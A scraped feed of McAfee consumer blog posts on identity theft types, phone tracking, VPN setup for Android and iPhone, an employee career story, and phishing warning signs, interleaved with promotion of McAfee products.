  • Fraudsters may use your credit card information to buy things. We all love to shop online — even criminals. Unfortunately, this issue has become especially prevalent thanks to online shopping during the COVID-19 pandemic.
  • Hackers may steal funds from your bank account. Sometimes, the amount might be so small that it seems inconsequential, totaling just a few dollars. However, criminals can rack up millions in damages if they target enough people in this way.
  • Criminals may open new accounts using your Social Security number and other data. For example, a person may use your data to open a new line of credit. They then run through the credit line, leaving you to foot the bill.

The good news is that it’s easy to protect yourself against financial identity theft by checking your bank accounts, credit card statements, and bills. If you see an unexplained charge, contact your credit card company or bank immediately to report it. Also, check your credit report for changes in your score. An unexplained decrease in your score could mean fraudulent activity. You can do this through AnnualCreditReport.com, where you can get a free credit report every 12 months from each of the three major credit bureaus.

Another idea is to place a one-year fraud alert on your credit reports to keep people from opening new accounts in your name. This encourages creditors and lenders to take extra precautions to verify your identity before granting any loans or credit increases. You can also place a security freeze on your credit report, which blocks others from accessing it to extend credit.

Medical identity theft

This might not seem like a real form of identity theft, but it happens. Medical identity theft is when a criminal poses as another person to obtain health care services. In fact, fraudsters may use your name and insurance information to:

  • Get prescriptions for drugs.
  • Access medical services, from checkups to costly surgeries.
  • Obtain medical devices and supplies, such as wheelchairs or hearing aids.

This can result in you having bills for prescriptions, services, or devices you didn’t need, ask for, or even receive. Your health care and insurance records may even have these things added to them. An inaccurate medical record can make it harder for you to get the care you need in the future and even impact insurance coverage.

Fortunately, you can help minimize the risk of medical identity theft by regularly reviewing your medical claims. Contact your insurer if you see unfamiliar procedures, prescriptions, or services. You’ll also want to let your health care provider know so that they can ensure your medical files are correct. Finally, consider filing a complaint with the U.S. Department of Health and Human Services (HHS).

Criminal identity theft

Criminal identity theft occurs when a person arrested by law enforcement uses someone else’s name instead of providing theirs. They might be able to pass this off by creating a fake ID or using a stolen ID, like your driver’s license, to show to the police. This type of fraud can be difficult to detect until the consequences are evident, like:

  • You receive a court summons. For example, the courts may issue a summons if a criminal uses your ID for unpaid parking tickets.
  • A bench warrant is issued for your arrest. Unresolved problems like unpaid parking tickets can also result in a judge issuing a bench warrant. You may then be taken into custody at any time, even during a routine traffic stop.
  • A background check is issued. Sometimes, police will keep an identity theft victim in their database, noting it as an alias for the real criminal. This can result in a false criminal record showing up on your background check. This can cause problems with potential landlords and employers.

You can help protect yourself against criminal identity theft by safeguarding your ID. If your license or state-issued ID is lost or stolen, report it to the local Department of Motor Vehicles (DMV) and law enforcement. Also, limit the information you share online (and encourage family members to do the same). For example, if your teen got their first driver’s license and wants to share a pic of it on social media, explain why this isn’t a good idea.

Synthetic identity theft

As one of the fastest-growing types of financial crime in the U.S., synthetic identity theft involves creating fake identities using real people’s information. Fraudsters may use data like birthdates, addresses, and Social Security numbers from real people, blending them to create a fake profile. They can then use this persona to apply for loans or credit cards or commit other financial crimes. Kids and older adults tend to be vulnerable to this type of fraud since they rarely use their SSNs.

The most important thing about synthetic identity theft is knowing the signs and acting fast. Keep an eye out for any mail with your address on it but addressed to a different name and phone calls or mail about new credit accounts. You can further protect yourself by regularly checking your credit reports for unexplained changes and placing a security freeze on them.

There are also identity monitoring services available, which scan the internet, including the dark web, for breached Social Security numbers. If you suspect you or a loved one is the victim of synthetic identity theft, contact the relevant financial institutions to alert them.

Child identity theft

We all want to protect our children from bad actors, especially when it comes to identity theft. Child identity theft involves using a minor’s information to commit financial fraud, like opening a new account or line of credit under the child’s name. The thief may even use the child’s identity to get a driver’s license, apply for government benefits, or buy a house. This is often easier than targeting an adult because most kids don’t have credit reports or financial accounts, making them a clean slate.

Unfortunately, child identity theft is often perpetrated within the family by a relative who has access to the child’s data like their birthdate and address. And many children don’t realize they’ve been targeted until they’re older — for example, when they try to take out a student loan. By this point, the issue may have been escalating for years. So, it’s important as a parent to be aware of child identity theft.

The best way to do this is to check whether your child has a credit report with any of the three big credit bureaus (TransUnion, Equifax, and Experian). If so, review the report and report any fraudulent activity. You can also place a freeze on your child’s credit report to help minimize the risk of future fraud.

How do you know if you’re a victim of identity theft?

No one wants to be left in the dark when it comes to identity theft, so knowing the signs can help you spot it and take action quickly. This can help stop fraud in its tracks, minimizing both immediate damage and long-term repercussions. Some warning signs that may indicate identity theft include:

  • You get a fraud alert from a financial institution. To protect customers against identity thieves’ scams, most banks have security protocols to pinpoint potential data breaches. For example, if you live in the U.S., but a purchase is made using your credit card information in London, your bank may stop the transaction and send you a credit card fraud alert.
  • There are unexplained changes in your credit score. Your credit score going up can mean someone is trying to extend credit in your name (with the intent to run through it). A dip in your score could indicate anything from a loan application to a bill going to collection. You can get a free copy of your credit report from the three major credit bureaus every 12 months.
  • There are changes to your financial accounts. Check your bank statements at least once a month, keeping an eye out for unfamiliar transactions or withdrawals. Also, check for an increase in your line of credit or a new credit card account (which someone else may have requested in your name).
  • A loan or credit card application is denied. If you apply for a new credit card or a loan and are turned down, find out why. If you thought you had good credit, double-check your current credit history. Identity theft can result in your credit score
  • You get phone calls from debt collectors. If collection agencies start calling you about unfamiliar debts, someone else might be using your information to open financial accounts or take out lines of credit. Don’t divulge any personal information on the phone but do check your credit report to see what debts they’re referring to.
  • You get unfamiliar mail. If you get mail sent to your address that’s clearly for someone else, that person might be using your address for personal gain. Be wary if you receive medical bills in the mail that you don’t recognize or W-2 forms for companies you’ve never worked for.
  • You experience tax return If you get a tax transcript you didn’t ask for, or the Internal Revenue Service (IRS) rejects your e-filing, identity theft might be to blame. Some thieves will file fraudulent returns to get the victim’s refund. Contact the IRS fraud alert department.

You can also increase your odds of recognizing identity theft with tools like McAfee’s identity protection services. Our continual monitoring can keep tabs on over 60 types of personal information, which allows us to quickly identify security issues, alerting you to potential breaches so that you can fix them. We’ll also notify you up to 10 months sooner than similar services. By combining the best practices described above with a comprehensive identity protection service, you can worry less about identity theft and spend more time enjoying the internet.

Start protecting your information today

The internet makes daily life easier in many ways. You can now learn, work, play, and shop online. You shouldn’t have to forego these conveniences because of the threat of identity theft.

McAfee’s identity theft protection services can help keep you and your loved ones safe. McAfee uses extensive monitoring and an early detection system to notify you of potential risks or breaches. You’ll also have access to 24/7 online security experts and up to $1 million of identity theft coverage. Get the peace of mind you need to continue using the internet with confidence.

The post 5 Common Types of Identity Theft appeared first on McAfee Blog.

]]>
Can My Phone Be Tracked If Location Services Are Off? https://www.mcafee.com/blogs/tips-tricks/can-my-phone-be-tracked-if-location-services-are-off/ Wed, 13 Jul 2022 12:50:36 +0000 https://www.mcafee.com/blogs/?p=151234

Your smartphone comes with built-in location services, which are useful if you lose it or if you use an app...

The post Can My Phone Be Tracked If Location Services Are Off? appeared first on McAfee Blog.

]]>

Your smartphone comes with built-in location services, which are useful if you lose it or if you use an app that needs to know your location. But what if you don’t want your phone to be tracked? Can the phone be located if you turn off location services? The answer is yes, it’s possible to track mobile phones even if location services are turned off. 

Turning off the location service on your phone can help conceal your location. This is important if you don’t want third parties knowing where you are or being able to track your movement. However, a smartphone can still be tracked through other techniques that reveal its general location.  

This article explains how your phone can be tracked and what you can do to enhance your mobile security. 

How can a phone be tracked?

Whether you have an iOS or Android phone, there are ways it can be tracked even if location services are turned off. You may have used some of these yourself to find a lost or stolen phone. For example, the Find My iPhone app uses Bluetooth to help you find an iPhone even if it’s offline. 

If you have an Android phone and the Find My Device app, you can log in to your Google account and use Google Maps to check your phone’s location history 

 Here are four ways that your phone could be tracked: 

Cell towers 

The United States has more than 307,000 cell towers. When you use your phone, signals travel back and forth to the nearest cell tower. Cell carriers can calculate the general area of your phone by measuring the time it takes for a signal to travel back and forth.  

Carriers use cell tower triangulation for a more accurate reading, which combines location data from three cell towers. This technology was developed to help 911 operators locate callers. It pinpoints the phone’s location within a 300-meter area 

Public Wi-Fi

A smartphone that has Wi-Fi enabled communicates with nearby Wi-Fi networks even if it’s not connected to one. Your device automatically scans Wi-Fi access points nearby and notes the signal strength.  

When using public Wi-Fi, the provider commonly asks you to agree to location tracking. That Wi-Fi provider will then record your location whenever you’re in range of one of its hot spots. 

To use public Wi-Fi while protecting your privacy, it’s a good idea to connect with a VPN like McAfee’s Safe Connect VPN. This software protects your data using bank-grade encryption to keep your online activity private. The VPN also keeps your IP address and physical location private. 

Cell site simulators

Cell site simulators — otherwise known as stingrays— mimic cellphone towers. They trick your phone into pinging it, transmitting its location, and identifying information. Stingrays cause cellphones to connect to them rather than to legitimate cell towers by transmitting a stronger signal than that from the cell towers.  

Law enforcement officers often use stingrays to locate and track the movement of potential suspects. While attempting to connect to a specific individual, stingrays connect data from all phones in the vicinity of the device. 

Malware or spyware

A device that is infected with malware or spyware can track your location even if your location settings are turned off. Malware can also record your online activities, allow cybercriminals to steal personal information, or slow down your operating system. 

To help protect your mobile device, consider getting a comprehensive security tool like McAfee Security for Mobile. It works for both Android and iOS devices and comes with an antivirus app that scans for threats and malware and blocks them in real-time. 

Can you tell if your phone is being tracked?

While many reasons for tracking a phone’s location information are benign — such as seeing where a loved one might be — scammers and hackers may track phones in an attempt to steal personal data.  

Luckily, some telltale signs can help you spot whether your phone is being tracked. 

Battery drain

When your phone has spyware, the program continuously runs in the background and drains your battery. A battery that is losing power faster than normal is either due to an old battery or spyware 

Check your battery health to see if it is still strong. If you use an iPhone, follow these steps to check battery health. You’ll see a maximum capacity score that shows your battery power compared to when it was new. An older phone with a battery capacity of 75% could explain why your battery loses power throughout the day. If your battery capacity is 95% or 100% and it drains quickly, however, a virus could be to blame. 

It’s a slightly different process to check the battery health on an Android device. Depending on the phone brand, you may need to download an app. 

Overheating 

Using apps with high processing demands can cause your mobile device to heat up. A spyware app that tracks your device’s location will use GPS, which causes the phone to work harder and overheat. If you’re using your smartphone normally and it overheats, it could be a sign of malware. 

Extra apps

If there are unfamiliar apps on your phone, someone may have tampered with it. The mystery app could be spyware. 

Unprompted activity

If your phone launches activities that you didn’t initiate, an app might be running in the background. In some cases, malware needs to reboot your phone to install updates or change the phone’s settings.  

A phone that automatically restarts lights up for no reason or makes noises during calls or texts could be infected with malware. 

Phone tracking FAQs 

Here are answers to some common questions about phone tracking. 

Can a phone be tracked if it’s turned off?

A phone that is turned off is difficult to track because it stops sending signals to cell towers. However, the service provider or internet provider can show the last location once it’s switched back on. 

Can a phone be tracked with no cell service/connection?

Even without cell service, Android devices and iPhones can be tracked. Your phone’s mapping apps can track your phone’s location without an internet connection.  

The GPS works in two ways: It uses Assisted GPS or A-GPS when you have a data connection. This uses the locations of cellphone towers and known Wi-Fi networks to figure out where you are. It also uses data from GPS satellites for more precise information. The A-GPS needs data service to work, but the GPS radio can receive satellite information without data service. 

Can a phone be tracked when it’s in airplane mode?

Yes, your phone can be tracked when it’s in airplane mode. While it does turn off Wi-Fi and cellular services, airplane mode doesn’t turn off GPS (a different technology that sends and receives signals from GPS satellites). You’ll have to disable GPS on your device and turn on airplane mode to prevent your phone from being tracked. 

Protect your mobile security with McAfee

Understanding how your phone can be tracked can help you protect your privacy. For greater peace of mind, though, it can help to have a mobile security tool like McAfee Security for Mobile to keep your Android or Apple device free from spyware 

Our all-inclusive mobile security tool safeguards your digital life by offering safe browsing, a secure VPN, and antivirus software. It actively protects you from malicious apps, like spyware, and unwanted visitors.  

With a dedicated mobile security app, you can use your phone the way you want without worrying about cybercriminals tracking your information.  

The post Can My Phone Be Tracked If Location Services Are Off? appeared first on McAfee Blog.

]]>
How to Set Up a VPN on an Android in 2022 https://www.mcafee.com/blogs/tips-tricks/how-to-set-up-a-vpn-on-an-android-in-2022/ Tue, 12 Jul 2022 23:04:17 +0000 https://www.mcafee.com/blogs/?p=151243

There’s no denying that the internet fills a big part of our days. Whether playing, working, or studying, we rely...

The post How to Set Up a VPN on an Android in 2022 appeared first on McAfee Blog.

]]>

There’s no denying that the internet fills a big part of our days. Whether playing, working, or studying, we rely on staying connected. But just as there’s a lot of good that comes with the internet, it can also make us susceptible to cybercriminals.  

This is especially true if you’re using your phone on public Wi-Fi. Anyone with access to the public network can see your online activity, including hackers 

Fortunately, by keeping your personal information and data secure, you can continue to live your best life online. Advanced security and privacy tools like virtual private networks (VPNs) can shield your identity online, allowing you to browse online without worrying about hackers. 

In this article, we’ll show you how to set up a VPN on your Android device manually or use a VPN app like McAfee’s Safe Connect VPN 

Why you should use a VPN on your Android device

Using a VPN with your Android phone can be a smart move that allows you to live a fully connected life without risking catching the eyes of cybercriminals. 

A VPN essentially hides your online presence and encrypts your information so that no one can steal sensitive data, like credit card details and passwords. It maximizes privacy and safety by sending your encrypted information through a tunnel to VPN servers in various locations globally. It’s so effective that not even your internet provider, search engine, or other third parties can take a peek at your data. 

If you like video streaming on your smartphone but often run into geo-restricted content, you’ll also find a VPN useful. It changes your IP address, allowing you to access blocked content on platforms like YouTube and Netflix. 

Does Android have a built-in VPN?

If you have an Android smartphone, you can use its built-in VPN client or legacy VPN. The integrated VPN uses several protocol suites, including PPTP, L2TP, and IPSec, to deliver a secure internet connection. 

However, you’ll have to configure the built-in VPN manually, which can be hard. So, if you’re not that tech-savvy, a VPN app can be a good option. McAfee Security for Mobile is one such app available on the Google Play Store. 

You might also want to opt for an app when:  

  • Setting up a VPN through an enterprise mobility management (EMM) platform 
  • Establishing a different VPN connection for your work profile or personal stuff through VPN settings 
  • Increasing your connection options by using VPN protocols not supported by the client 

How to set up a VPN on Android

Depending on your connection requirements and tech skills, we’ll walk you through how to set up your VPN manually or through an app. 

How to manually set up an Android VPN 

Setting up a VPN manually by adjusting the VPN settings is one way to get the job done. This approach allows you to connect your device to a VPN server by entering configuration details. 

You can set up the VPN manually via the user interface (UI) on your Android phone. The UI plays a big role in setting up and controlling the VPN solution. When the VPN is active, your mobile device system notifies you through the home screen. 

To get your VPN up and running on your Android operating system, you’ll need to find the “Settings” menu on your device. 

  1. Once you reach the “Settings” menu, select “Wireless & Networks” or “Wi-Fi & Internet.” 
  2. From there, select “VPN” (depending on your device, you may first need to tap “More”). 
  3. Next, find the “+” sign at the top right corner of your screen or go to the “Advanced Options” menu via the three vertical dots icon. 
  4. Finally, enter your VPN’s configuration details like username, server address, and password. The VPN provider will typically provide this information.  

How to set up an Android VPN using an app

If you want to set up a VPN quickly and easily, your best bet is to install a VPN app on your mobile device. For instance, you can simply download McAfee’s Mobile Security app from the Google Play Store and register an account, allowing you to log in and start enjoying full protection. 

Once you choose a VPN provider and sign up for a subscription plan (if paid), you’re ready to set up your VPN using the Android app. While the setup process can differ slightly depending on the VPN, here’s the process for setting up McAfee’s Safe Connect VPN app: 

  1. First, download and install the VPN app from the Google Play Store. 
  2. Launch the app. 
  3. Accept the Privacy Notice and License Agreement. 
  4. On the next screen, you’ll be asked to activate a free seven-day trial (no credit card required) or continue with a free account (250 MB data
  5. protection limit). 
  6. Next, select the ideal VPN server in a location that suits your connection needs. 
  7. Activate your VPN by tapping the blue “Start Protection” button or turn on “Safe Connect” using a slider located on your phone’s notifications area.  
  8. Lastly, agree to the connection request by tapping “Ok” on the dialog box that appears. And, voila, your McAfee VPN for Mobile is active. 

Keep your Android secure with McAfee Security for Mobile

Now that you know about various steps to install a VPN on an Android device, consider investing in the award-winning McAfee Mobile Security App. This service comes with useful security tools for browsing the net on mobile devices and privacy protection for your Wi-Fi network. You can count on the award-winning software to secure your phone and the data it sends over the internet. 

In addition to keeping your connection private, the software detects unwanted visitors and malicious apps. McAfee Mobile Security integrates an antivirus VPN that scans your device for cyberthreats and neutralizes them. The software delivers robust protection against evolving threats and gives you peace of mind. 

Start protecting your digital life and securing your network traffic by signing up for McAfee Security for Mobile today. 

The post How to Set Up a VPN on an Android in 2022 appeared first on McAfee Blog.

]]>
Don’t Stop Learning! Jeremy’s McAfee Journey https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/dont-stop-learning-jeremys-mcafee-journey/ Tue, 12 Jul 2022 17:19:42 +0000 https://www.mcafee.com/blogs/?p=155591

Our How I Got Here series spotlights the stories of team members who have successfully grown their careers here at McAfee. This...

The post Don’t Stop Learning! Jeremy’s McAfee Journey appeared first on McAfee Blog.

]]>

Our How I Got Here series spotlights the stories of team members who have successfully grown their careers here at McAfee. This journey features Jeremy whose passion for learning has seen him grow his career in our Technology Services Team.

My McAfee career journey

In 2015, I started as a contract worker to help manage network cabling in McAfee’s buildings. While I was doing that, I was also asked to help manage our voice network (think of this as phones and conference lines) for North and South America. A year after working in both of those roles, I was asked to focus on voice network engineering. After a couple of years, I began training as an engineer for our audio-visual workspace, which helps bring efficiency and centralization to our conference room communications and collaboration tools. And today, I am a Unified Communications Engineer!

My other role within McAfee is Co-President of the McAfee Veterans Community. I absolutely love the community of veterans from around the globe and our community allies. It’s a wonderful group of people who are always willing to serve their local communities. We have hosted inspiring guest speakers, and volunteer events, and continue to hold monthly virtual Coffee Talks and Happy Hours.

A typical day?

I don’t believe that I’ve ever had a typical workday. One moment I’m entering new employees into our systems, and the next I’m providing backend call-center support. I also help run our big Microsoft Teams live events. And, of course, I troubleshoot communications issues as they arise.

I truly enjoy working with the Technology Services team and especially the Voice and Video Team. Being able to collaborate with such wonderful teams is a really rewarding part of my role.

Changing my career

For about a decade in my previous role, I managed a team doing general upkeep in computer systems and I felt really comfortable doing that! I joined McAfee to do a similar role, but shortly afterward I was asked to pivot to more of an engineering role. It was a bit overwhelming at first, but luckily the team I was with was very helpful and supportive of my learning curve. Even though it was out of my comfort zone, I’m so glad I was given the opportunity – it has blessed mine and my family’s life!

​​​​​​​My advice for anyone looking to drive their career forward is

To never stop learning. There is ALWAYS something to learn and someone who can mentor you. I believe that if you are surrounded by smart people (and pay attention), you can’t help but learn and grow! I absolutely love to learn, so this has been one of top of the reasons why I have loved my job since my very first day.

The post Don’t Stop Learning! Jeremy’s McAfee Journey appeared first on McAfee Blog.

]]>
How to Set Up a VPN on an iPhone in 2022 https://www.mcafee.com/blogs/tips-tricks/how-to-set-up-a-vpn-on-an-iphone-in-2022/ Tue, 12 Jul 2022 12:44:28 +0000 https://www.mcafee.com/blogs/?p=151228

A virtual private network (VPN) is a tool that hides your geolocation and protects your privacy while you’re online. It...

The post How to Set Up a VPN on an iPhone in 2022 appeared first on McAfee Blog.

]]>

A virtual private network (VPN) is a tool that hides your geolocation and protects your privacy while you’re online. It does this by creating an encrypted tunnel from your home network to a VPN provider’s server.  

When you buy an internet plan, your internet service provider (ISP) gives your equipment (like your router and modem) an Internet Protocol (IP) address. Your IP address helps you communicate with the broader internet by letting a website you’re on know where data is coming from and where to send it.  

In other words, your IP address lets online companies know where you are. Most online businesses store IP addresses for data analysis, but cybercriminals can use your IP to track your activity online, steal your personal information, and target you for scams.  

A VPN reroutes your internet through a server address with a different IP than your own. That way, no one online can trace your internet activity back to you. A VPN also encrypts your internet data to protect your personal information.  

VPNs aren’t just for desktop computers, though. All sorts of devices — from iPads to smart TVs — can benefit from a VPN connection. If you’re the type of person who handles your finances or does business online using a mobile device, it’s wise to get a VPN to protect yourself.  

This article will show you how to choose and install a VPN on your iPhone 

Why use a VPN? 

Here are a few of the main ways getting a VPN like McAfee Safe Connect VPN can benefit you:  

  • A VPN can help you remotely access your work intranet. An intranet is a small subsection of the internet that doesn’t connect to the larger internet. Businesses use intranets — where companies may store important internal-only files — to give their employees quick access to company work tools and improve communication.  
  • A VPN uses bank-grade encryption to hide your personal information and actions from cybercriminals and advertisers. This lets you shop, bank, and do everything else online without worrying about someone stealing your information, even if you’re using a public Wi-Fi network. 
  • A VPN can keep your browsing private. It does this by hiding your IP address, so your physical location, banking information, and credit card information are protected while you surf online.  

How to choose a VPN provider

The best VPN for you depends on your situation and what you plan to do online.  

You’ll need a VPN that’s compatible with all of your devices. Many VPNs work with Windows, Android, macOS, Linux, and iOS. However, not all VPNs are compatible with every operating system. For instance, if you have an iPhone but someone else in your home has an Android, it’s important to choose a provider with an app in the Apple App Store and the Google Play Store.  

Consider which features you’ll need:  

  • Will you be traveling? If so, get a VPN with server locations where you’re going.  
  • Do you have a large family with a lot of devices? Then, a router-based VPN can be a good choice.  
  • Will you use your VPN for things like streaming movies on Netflix and gaming? You’ll want a VPN with a lot of speed and bandwidth.  

Be careful when choosing a VPN service, though. Some free VPN services will still pass along your information to ad agencies. If online privacy is your main goal, you’ll want to find a VPN that doesn’t store logs of your internet activity or pass along your data.  

VPN protocols also matter, and they vary in speed and security. For example, Point-to-Point Tunneling Protocol (PPTP) is a fast protocol, but it’s not as secure as other protocols like OpenVPN or Wireguard. Some VPN providers will let you use multiple protocols.  

Finally, look for a VPN that’s easy to use. Some VPNs have convenient features like virtual setup and intuitive interfaces that make using them easier. Some providers will even give you a free trial to test out the VPN before committing to it. Be sure your VPN network also has a reliable support team to help you if you ever have problems. 

How to set up a VPN on an iPhone

We’ll show you how to complete VPN setup on your iPhone in the next few sections.  

Install the iOS app of a VPN provider

Go to the Apple App store on your iPhone and find an app for the VPN provider you’ve chosen. Tap “Get” and “Install” or double-check to install the app on your phone.  

Create an account on the VPN app

Open the VPN app. Create an account with the VPN provider. Sign up for the service.  

Open iPhone settings and connect to the VPN

You’ll have to enter your passcode after creating your account to allow a change in your phone’s VPN settings and enable the VPN.  

You might have to manually configure your VPN if you need access to a private network at a business or school. Here’s how to manually enable a VPN to work on your iPhone 

  1. Tap on your “Settings” app on the Home Screen of your iPhone. 
  2. Choose “General.” 
  3. Press “VPN.” 
  4. Tap “Add VPN Configuration.”  
  5. Press “Type” and pick the type of VPN protocol you’re using. It could be IKEv2, IPSec, or L2TP 
  6. Type in a description, remote ID, and a server for the VPN.  
  7. Type in your username and password.  
  8. Click “Manual” or “Auto” to enable your proxy server (if using one).  
  9. Press “Done.” 

Use the VPN on your iPhone

After you’ve enabled the VPN on your iPhone settings, you’ll have to activate it when you want to use it. Here’s how you can make your VPN active: 

  1. Go to the “Settings” app on your phone.  
  2. Go to “General.”  
  3. Choose “VPN.”  
  4. Tap the status switch on your VPN to turn it on.  

Be sure to turn off your VPN whenever you’re not using it so it doesn’t use up your battery. It’s especially important to turn off your VPN if you’re on a limited plan from your provider.  

Keep your device safe with McAfee Security for Mobile

A VPN is a great tool for keeping your internet connection private. When you install a VPN on your iPhone, you can enjoy the internet from anywhere knowing that your personal information has an extra layer of protection against advertisers and hackers 

Whether you use an Android or an iOS device, though, McAfee can help you stay safe online. With McAfee Security for Mobile, you can access quality security tools like a VPN and safe browsing.  

Our award-winning app allows you to connect safely and seamlessly to the digital world while keeping unwanted visitors from entering your digital space. Enjoy one of our most comprehensive security technologies while living your best life online. 

The post How to Set Up a VPN on an iPhone in 2022 appeared first on McAfee Blog.

]]>
What Is Phishing? https://www.mcafee.com/blogs/tips-tricks/what-is-phishing/ Mon, 11 Jul 2022 22:35:47 +0000 https://www.mcafee.com/blogs/?p=151222

So much of our personal and professional lives are online — from online banking to connecting with friends and family...

The post What Is Phishing? appeared first on McAfee Blog.

]]>

So much of our personal and professional lives are online — from online banking to connecting with friends and family to unwinding after a long day with our favorite movies and shows. The internet is a pretty convenient place to be! Unfortunately, it can also be a convenient place for cybercriminals and identity theft. 

One way these scammers may try to take advantage of someone is by trying to convince them to give up their personal information or click on links that download things like malware. They might try to appear as a trustworthy source or someone you personally know. This fake online communication is called “phishing.” 

As we’ve all heard before, knowledge is power. By understanding what phishing is, how it works, and the signs to look for, you can help minimize your risk and get back to enjoying the internet the way it was intended. Here’s what you should know. 

How does phishing work?

You’ve probably heard of the term “phishing,” but maybe you don’t know what it means. Here’s a quick overview of how it works.  

Phishing is a type of cybercrime where scammers send communications that appear to be from trusted sources like a major corporation — basically, they’re trying to play off people’s trust through what is known as social engineering. They might request sensitive information like passwords, banking information, and credit card numbers. Hackers may then use this information to access your credit cards or bank accounts 

The thing with phishing attacks, though, is that they can come through several platforms, including:  

  • Email: This is the most common type of phishing, with 96% of phishing attacks occurring by email. 
  • Phone calls: Scammers might leave messages encouraging targets to call a number where someone will ask for their personal information.  
  • Text messages: The goal is to get people to click links to a malicious website or webpage 
  • Wi-Fi spoofing: Scammers create a malicious free Wi-Fi hotspot that appears to be a legitimate access point. Once connected, they have access to a user’s system. 

What kind of information are phishing scams after?

We’ve mentioned that phishers are looking to get sensitive information, but what exactly are they after? The kind of information phishing scams are after might include:  

  • Login information (including email account and password) 
  • Credit card information 
  • Bank account numbers 
  • Social Security numbers 
  • Company data 

Types of phishing attacks

Phishing scams can come in many forms, but understanding the common types of phishing attacks can help you keep identity thieves at bay. Here are some to be aware of:  

Email phishing

A phishing email is a fraudulent email made to look like it’s from a legitimate company or person. It may ask you to provide personal information or click on a link that downloads malware. For example, an email allegedly from Bank of America notes that due to suspicious activity, you should log into your bank account to verify your information.  

Fortunately, there are ways to spot a phishing cyberattack like this.  

  • There are typos and grammatical errors. If the email is filled with spelling and grammatical errors, it’s likely a phishing scam. Corporations don’t send out emails riddled with errors. 
  • A bank requests personal information. Financial institutions don’t email you to ask for personal information like your PIN, Social Security number, or bank account number. If you receive an email like this, delete it and don’t provide any information. 
  • The URL doesn’t match. To see the sender’s email address, hover over the name of the sender or on the link in the email. If the sender’s address doesn’t match the name that shows, that’s a red flag. For example, if an email that appears to be from FedEx has an email address without the company name in it or if it’s spelled wrong, it’s most likely a phishing email. To check the URL of a link on a mobile phone, press the link and hold it with your finger. 
  • The email isn’t personalized. A company you do business with will address you by name. A phishing email might use a general greeting like “Dear Account Holder.” 
  • There’s a sense of urgency. Phishing messages create fake emergencies to get you to act without thinking. They might claim an account is being frozen unless you immediately confirm your personal details. Requests for emergency action are usually phishing emails. A legitimate business gives its customers a reasonable amount of time to respond before closing an account. 
  • It’s from an unfamiliar sender. Consider deleting an email from a sender you don’t recognize or a business you don’t patronize. Also, be cautious with a message from someone you know who seems unusual or suspicious. 

Spear phishing 

While some phishing emails are sent to a broad audience, spear phishing emails target specific individuals or businesses. This allows the scammers to research the recipient and customize the message to make it look more authentic.  

Examples of spear phishing emails include:  

  • Enterprise hacking: Cybercriminals send emails to employees in a corporation to find vulnerabilities in a corporate network. The emails might appear to be from a trusted source. It only takes one person to click on a link to download ransomware that infects the company’s network.  
  • A note from the boss: An employee receives a fraudulent email that appears to be from an executive asking them to share company information or expedite payment to a vendor. 
  • Social media scam: Cybercriminals can use information from your social media account to request money or data. For example, a grandparent might receive a text using the name of their grandchild asking for money for an emergency. But when they call to check, they find out their grandchild is safe at home. 

One of the best defenses against spear phishing is to contact the source of an email to verify the request. Call the colleague who’s asking you to do a wire transfer or log onto your Amazon account to check for messages. 

Clone phishing

For this highly customized scam, scammers duplicate a legitimate email you might have previously received and add attachments or malicious links to a fake website. The email then claims to be a resend of the original. Clicking a malicious link can give spammers access to your contact list. Your contacts can then receive a fake email that appears to be from you. 

While clone phishing emails look authentic, there are ways to spot them. They include:  

  • Follow up directly. Go to the website of the bank, online retailer, or business to see if you need to take action. 
  • Look at the URL. Only websites that begin with HTTPS should be trusted, never sites that begin with HTTP. 
  • Look for mistakes. As with any phishing email message, be on the lookout for spelling errors and poor grammar. 

Voice phishing

Through vishing or voice phishing, scammers call you and try to persuade you to provide sensitive data. They might use caller ID spoofing to make the call appear to be from a local business or even your own telephone number. Vishing calls are usually robocalls that leave a voicemail or prompt you to push buttons for an operator. The intent is to steal credit card information or personal and financial information to be used in identity theft. 

Fortunately, there are signs that give away these attacks. They include:  

  • The call is from a federal agency. If a caller pretends to be from a federal agency, it’s likely a scam. Unless you’ve requested it, agencies like the IRS won’t call, text, or email you. 
  • It requires urgent action. Scammers might attempt to use fear to make you act quickly. The pressure to act immediately is a giveaway. 
  • They request personal information. It’s a red flag when the caller asks for your information. Sometimes, they’ll have some of your data, even the first few digits of your Social Security number. The scammer will try to make you think the call is legit and get you to provide additional information. 

If you’d like to avoid vishing calls, there are several things you can do. When you don’t recognize the number, don’t answer the phone. Let the call go to voicemail, then block it if it isn’t legitimate. Use a call-blocking app to filter calls coming to your cellphone. To block calls on a landline, check with your service provider regarding the services offered.  

Dealing with a cybercriminal is no time to be polite. If you do answer a vishing call, hang up as soon as you realize it. Don’t answer any questions, even with a yes or no. Your voice could be recorded and used for identity theft. If they ask you to push a button to be removed from a call list, don’t do it. You’ll just receive more calls. 

If you receive a voicemail and are unsure if it’s legitimate, call the company directly using the phone number on the company website. Don’t call the number in the voicemail. 

Smishing

If you’ve ever received a text pretending to be from Amazon or FedEx, you’ve experienced smishing. Scammers use smishing (SMS phishing) messages to get people to click on malicious links with their smartphones. Some examples of common fraudulent text messages include: 

  • Winning prizes: If it seems too good to be true, it probably is. 
  • Fake refunds: A company you do business with will credit your account or credit card, not text you. 
  • Relatives who need help: These messages might request bail money or other assistance for a relative who is abroad. 
  • Messages from government agencies: Always delete these texts because federal agencies don’t conduct business by text message. 
  • Texts from companies like Amazon or Apple: These are the most frequently spoofed businesses because most people do business with one or both of them. 

If you receive a smishing text, don’t respond because it’ll cause you to receive more texts. Instead, delete the text and block the number. 

Pop-up phishing

Pop-up phishing occurs when you’re on a website and a fake pop-up ad appears. It encourages you to click a link or call a number to resolve the issue. Some of these reload repeatedly when you try to close them or freeze your browser.  

Common pop-up scams include:  

  • Infected computer alert: This scam ad tries to persuade you to click a link to remove viruses from your computer. For added urgency, some even include fake countdown clocks that give you a few seconds to click a link and install antivirus software. The link actually installs malware. Legit antivirus software like McAfee® Total Protection won’t do that — instead, keeping your connected life safe from things like malware, phishing, and more. 
  • AppleCare renewal: This pop-up encourages you to call a fake Apple number to give credit card information to extend your Apple warranty. 
  • Email provider pop-ups: You’re encouraged to provide personal data by this pop-up, which appears to come from your email provider. 

If you see a scam pop-up ad, don’t click on the ad or try to click the close button within the ad. Instead, close out of the browser window. If your browser is frozen, use the task manager to close the program on a PC. On a Mac, click the Apple icon and choose Force Quit. 

What should I do if I am a victim of phishing?

Being online makes us visible to a lot of other people, including scammers. Fortunately, there are things you can do if you become a victim of phishing — allowing you to get back to enjoying the digital world. They include: 

  • File an FTC report. Go to IdentityTheft.gov to report phishing and follow the steps provided. 
